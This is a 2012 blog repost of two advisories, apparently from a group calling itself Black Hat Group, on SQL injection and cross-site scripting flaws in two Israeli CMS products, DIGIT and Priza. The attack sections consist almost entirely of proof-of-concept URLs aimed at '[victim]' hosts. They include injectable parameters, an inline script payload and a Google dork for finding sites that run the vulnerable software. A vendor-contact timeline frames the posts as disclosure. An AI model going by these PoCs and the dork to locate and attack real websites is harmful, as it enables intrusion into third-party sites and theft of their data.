Searching...
January 6, 2012
Anonymous
Friday, January 06, 2012
0 comment

[RECONNAISSANCE] SQL Injection 6 January

Home » Information Gathering » SQL Injection » [RECONNAISSANCE] SQL Injection 6 January
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability 
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG


[PoC] : /website_path/Default.asp?sType=0&PageId=[Sqli]


 Enter In Search Box XSS Code 
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM name=searchFORMstyle="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH">
</FORM>

[PoC] : Http://[victim]/path/Default.asp

Note : There are vulnerabilities in the search field that you can use


 Timeline:
~~~~~~~

- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.

 Important Notes:
~~~~~~~~~~~~~

- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in

- the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.



Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.priza.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Powered by Priza"
# Version : [0.0.2]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------

[PoC] : /website_path/index.asp?p_id=201&id=[SQLi]

[PoC] : /website_path/index.asp?page_id=[SQLi]

[PoC] : /website_path/volumes.asp?id=18

[PoC] : /website_path/index.asp?action=find&page_id=28&string=[Xss]

[PoC] : Http://[victim]/path/index.asp?p_id=201&id=[SQLi]

[PoC] : Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>


 Timeline:
~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.

 Important Notes:
~~~~~~~~~

- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in

- the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.

Originaly Created By Anonymous on Friday, January 06, 2012
Labels: ,
Share This To :

0 comment:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Back to top!